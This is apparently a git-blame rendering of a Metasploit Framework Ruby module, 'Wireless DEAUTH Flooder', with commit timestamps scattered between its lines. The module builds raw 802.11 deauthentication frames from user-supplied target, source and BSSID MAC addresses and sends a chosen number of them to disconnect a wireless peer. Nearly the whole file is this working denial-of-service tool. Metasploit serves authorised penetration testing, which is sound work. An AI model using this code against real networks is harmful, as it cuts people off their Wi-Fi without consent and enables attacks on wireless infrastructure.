2010-04-30 08:40:19 +00:00
|
|
|
##
|
|
|
|
# $Id$
|
|
|
|
##
|
|
|
|
|
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
2012-02-21 01:40:50 +00:00
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/
|
2010-04-30 08:40:19 +00:00
|
|
|
##
|
|
|
|
|
2008-04-21 05:41:53 +00:00
|
|
|
require 'msf/core'
|
|
|
|
|
2008-10-02 05:23:59 +00:00
|
|
|
class Metasploit3 < Msf::Auxiliary
|
2008-04-21 05:41:53 +00:00
|
|
|
|
2009-10-23 15:59:13 +00:00
|
|
|
include Msf::Exploit::Lorcon2
|
2008-11-18 20:00:31 +00:00
|
|
|
include Msf::Auxiliary::Dos
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2008-04-21 05:41:53 +00:00
|
|
|
def initialize(info ={})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Wireless DEAUTH Flooder',
|
|
|
|
'Description' => %q{
|
2010-09-20 08:06:27 +00:00
|
|
|
This module sends 802.11 DEAUTH requests to a specific wireless peer,
|
|
|
|
using the specified source address and source BSSID.
|
|
|
|
},
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2008-04-21 05:41:53 +00:00
|
|
|
'Author' => [ 'Brad Antoniewicz' ],
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Version' => '$Revision$'
|
2010-09-20 08:06:27 +00:00
|
|
|
))
|
|
|
|
|
2008-04-21 05:41:53 +00:00
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptString.new('ADDR_DST',[true, "TARGET MAC (e.g 00:DE:AD:BE:EF:00)"]),
|
|
|
|
OptString.new('ADDR_SRC',[true, "Source MAC (e.g 00:DE:AD:BE:EF:00)"]),
|
|
|
|
OptString.new('ADDR_BSS',[true, "BSSID (e.g 00:DE:AD:BE:EF:00)"]),
|
2008-11-24 18:42:59 +00:00
|
|
|
OptInt.new('NUM',[true, "Number of frames to send",100])
|
2008-04-21 05:41:53 +00:00
|
|
|
],self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2008-04-21 05:41:53 +00:00
|
|
|
print_status("Creating Deauth frame with the following attributes:")
|
|
|
|
print_status("\tDST: #{datastore['ADDR_DST']}")
|
|
|
|
print_status("\tSRC: #{datastore['ADDR_SRC']}")
|
|
|
|
print_status("\tBSSID: #{datastore['ADDR_BSS']}")
|
|
|
|
|
|
|
|
open_wifi
|
|
|
|
|
|
|
|
print_status("Sending #{datastore['NUM']} frames.....")
|
|
|
|
|
2008-11-13 06:27:31 +00:00
|
|
|
datastore['NUM'].to_i.times do
|
2008-04-21 05:41:53 +00:00
|
|
|
wifi.write(create_deauth())
|
|
|
|
end
|
|
|
|
close_wifi
|
2010-04-30 08:40:19 +00:00
|
|
|
end
|
|
|
|
|
2008-04-21 05:41:53 +00:00
|
|
|
def create_deauth
|
2010-04-30 08:40:19 +00:00
|
|
|
|
|
|
|
seq = [rand(255)].pack('n')
|
2008-04-21 05:41:53 +00:00
|
|
|
frame =
|
|
|
|
"\xc0" + # Type/SubType
|
|
|
|
"\x00" + # Flags
|
|
|
|
"\x3a\x01" + # Duration
|
|
|
|
eton(datastore['ADDR_DST']) + # dst addr
|
|
|
|
eton(datastore['ADDR_SRC']) + # src addr
|
|
|
|
eton(datastore['ADDR_BSS']) + # BSSID
|
2010-04-30 08:40:19 +00:00
|
|
|
seq + # sequence number
|
2008-04-21 05:41:53 +00:00
|
|
|
"\x07\x00" # Reason Code (nonassoc. sta)
|
|
|
|
return frame
|
|
|
|
end
|
2008-11-13 06:27:31 +00:00
|
|
|
end
|